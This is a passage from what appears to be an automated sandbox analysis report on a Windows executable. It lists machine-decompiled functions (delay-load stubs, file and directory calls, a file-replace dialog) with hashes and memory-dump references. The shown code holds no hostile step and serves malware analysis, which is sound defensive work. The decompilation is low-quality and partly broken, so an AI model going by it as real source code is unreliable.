				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 705cfb42754ebbf0f3820fff430cf1da9ffdb9b3f149e5e802007b8a572ed139
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: 705cfb42754ebbf0f3820fff430cf1da9ffdb9b3f149e5e802007b8a572ed139
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D7BB, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D7BB() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 81cc12594a6f861ee879253e595916bf976f5276c9b9fa0050b5e7efc04479ea
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: 81cc12594a6f861ee879253e595916bf976f5276c9b9fa0050b5e7efc04479ea
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D793, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D793() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 04c29f96dc252cdbe561fc351cc3dba0032c3ab26777154f3524027e1021e5a9
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: 04c29f96dc252cdbe561fc351cc3dba0032c3ab26777154f3524027e1021e5a9
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D7E3, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D7E3() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: b4bc3165382662bac2f365eb6c00d70371aa328e57be2787bf179324e73a00a5
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: b4bc3165382662bac2f365eb6c00d70371aa328e57be2787bf179324e73a00a5
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D7ED, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D7ED() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: a8090083f2dfca6dd947b6d63276ce60a81f7b8ca877bec4cbfb350edb908b28
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: a8090083f2dfca6dd947b6d63276ce60a81f7b8ca877bec4cbfb350edb908b28
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D7C5, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D7C5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: a8b9fbdb1ad7c899c077f58b5e3f933f374cec1c7a5af31cdb1612ce6822c1cc
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: a8b9fbdb1ad7c899c077f58b5e3f933f374cec1c7a5af31cdb1612ce6822c1cc
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D7D9, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D7D9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ada4); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d6f4
                                                                                                                                                    0x0122d6f9
                                                                                                                                                    0x0122d700

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D6F9
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: 73119ec0c9b1f5ad00a874bb762314bd5ab10547b84add64c8c4ad590cca2859
                                                                                                                                                    • Instruction ID: 3e679b7c22c7bb01ca675bc6276c9f2e6b466ae26c9f43323330ea861afd506e
                                                                                                                                                    • Opcode Fuzzy Hash: 73119ec0c9b1f5ad00a874bb762314bd5ab10547b84add64c8c4ad590cca2859
                                                                                                                                                    • Instruction Fuzzy Hash: 11A001E72B992BBE319862A2AD06D3E121CC8E4AA2334995EF44785480A88818550032
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D990, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                    			E0122D990() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x124ae04); // executed
				E0122DDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                                                    0x0122d993
                                                                                                                                                    0x0122d998
                                                                                                                                                    0x0122d99f

                                                                                                                                                    APIs
                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0122D998
                                                                                                                                                      • Part of subcall function 0122DDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0122DE2C
                                                                                                                                                      • Part of subcall function 0122DDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0122DE3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                    • Opcode ID: fb9592ef89743e1317d9f0f4d86b9e174f4b650fcb527d4aff94cb53e0cc627a
                                                                                                                                                    • Instruction ID: 0bf56bafa5463434f09df916758a6af0a140d1380776813131c0281e6afc1add
                                                                                                                                                    • Opcode Fuzzy Hash: fb9592ef89743e1317d9f0f4d86b9e174f4b650fcb527d4aff94cb53e0cc627a
                                                                                                                                                    • Instruction Fuzzy Hash: D8A002E73FD5377D315C72A26E07D3F021CC4E0E21338D56EF811C5081A9881C450471
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219DFF, Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E01219DFF(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}




                                                                                                                                                    0x01219e02
                                                                                                                                                    0x01219e0b
                                                                                                                                                    0x01219e0e

                                                                                                                                                    APIs
                                                                                                                                                    • SetEndOfFile.KERNELBASE(?,012190AB,?,?,-00001960), ref: 01219E02
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 749574446-0
                                                                                                                                                    • Opcode ID: 9383c32969d039b2a4051c0a3d61981fce90f57efe04e20bb920229a4df8ef51
                                                                                                                                                    • Instruction ID: 0d5cc585cc8fea8b44caa04666298bcc773a04f6d4bc89d9b52231e6a2bc7f10
                                                                                                                                                    • Opcode Fuzzy Hash: 9383c32969d039b2a4051c0a3d61981fce90f57efe04e20bb920229a4df8ef51
                                                                                                                                                    • Instruction Fuzzy Hash: F4B012340A0005878F102E30E8084143A56E62130630051607002C5054CB12C0039700
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A2A0, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0122A2A0(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}




                                                                                                                                                    0x0122a2a4
                                                                                                                                                    0x0122a2ac
                                                                                                                                                    0x0122a2b0

                                                                                                                                                    APIs
                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0122A507,C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0,00000000,0125846A,00000006), ref: 0122A2A4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1611563598-0
                                                                                                                                                    • Opcode ID: 9137fd4ce076ad2d26e7934604708d7c8e86bcdd5c475813b6c64b880195871c
                                                                                                                                                    • Instruction ID: 5b67604a09d0b2e99990bb9155615083a46f523952998110649d9d8846c45d90
                                                                                                                                                    • Opcode Fuzzy Hash: 9137fd4ce076ad2d26e7934604708d7c8e86bcdd5c475813b6c64b880195871c
                                                                                                                                                    • Instruction Fuzzy Hash: 72A01234194006878E100B30E90DC1576515760702F0086207106C0094CB308810A600
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 0122B820, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                    			E0122B820(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				struct HWND__* _t160;
				intOrPtr _t163;
				void* _t164;
				int _t167;
				int _t170;
				void* _t175;
				void* _t177;

				_t157 = __edx;
				_t152 = __ecx;
				E0122E1C0();
				_t148 = _a6748;
				_t163 = _a6744;
				_t160 = _a6740;
				if(E0121130B(__edx, _t160, _t163, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t164 = _t163 - 0x110;
					if(_t164 == 0) {
						SetFocus(GetDlgItem(_t160, 0x6c));
						E0121FD96( &_a2640, _a6752, 0x800);
						E0121BC9B( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t160, 0x65,  &_a2616);
						 *0x1271080( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t160, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t167 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E01213FD6( &_a900, 0x200, L"%s %s %s", E0121DD11(_t152, 0x99));
							_t177 = _t175 + 0x18;
							SetDlgItemTextW(_t160, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t151 = 0x200;
							} else {
								asm("adc eax, ebp");
								E0122A5BC(0 + _a344, _a340,  &_a212, 0x32);
								_push(E0121DD11(0 + _a344, 0x98));
								_t151 = 0x200;
								E01213FD6( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t160, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t160, 0x67, 0x170, _a1928, 0);
							_t153 =  *0x1257464; // 0x0
							E01220B3D(_t153, _t157,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t167,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E01213FD6( &_a896, _t151, L"%s %s %s", E0121DD11(_t153, 0x99));
							_t175 = _t177 + 0x18;
							SetDlgItemTextW(_t160, 0x6b,  &_a896);
							_t154 =  *0x126cc84;
							_t158 =  *0x126cc80;
							if((_a304 & 0x00000010) == 0 || (_t158 | _t154) != 0) {
								E0122A5BC(_t158, _t154,  &_a212, 0x32);
								_push(E0121DD11(_t154, 0x98));
								E01213FD6( &_a884, _t151, L"%s %s",  &_a192);
								_t175 = _t175 + 0x14;
								SetDlgItemTextW(_t160, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t164 != 1) {
						goto L27;
					}
					_t170 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t170;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t170);
						L13:
						_t137 = SendDlgItemMessageW(_t160, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0x12710cc(_t137);
						}
						EndDialog(_t160, _t170);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t170 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t170 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}





























                                                                                                                                                    0x0122b820
                                                                                                                                                    0x0122b820
                                                                                                                                                    0x0122b825
                                                                                                                                                    0x0122b82b
                                                                                                                                                    0x0122b834
                                                                                                                                                    0x0122b83e
                                                                                                                                                    0x0122b85d
                                                                                                                                                    0x0122b867
                                                                                                                                                    0x0122b86d
                                                                                                                                                    0x0122b8e7
                                                                                                                                                    0x0122b902
                                                                                                                                                    0x0122b911
                                                                                                                                                    0x0122b921
                                                                                                                                                    0x0122b942
                                                                                                                                                    0x0122b958
                                                                                                                                                    0x0122b974
                                                                                                                                                    0x0122b979
                                                                                                                                                    0x0122b98c
                                                                                                                                                    0x0122b99c
                                                                                                                                                    0x0122b9a2
                                                                                                                                                    0x0122b9a8
                                                                                                                                                    0x0122b9a9
                                                                                                                                                    0x0122b9ae
                                                                                                                                                    0x0122b9b1
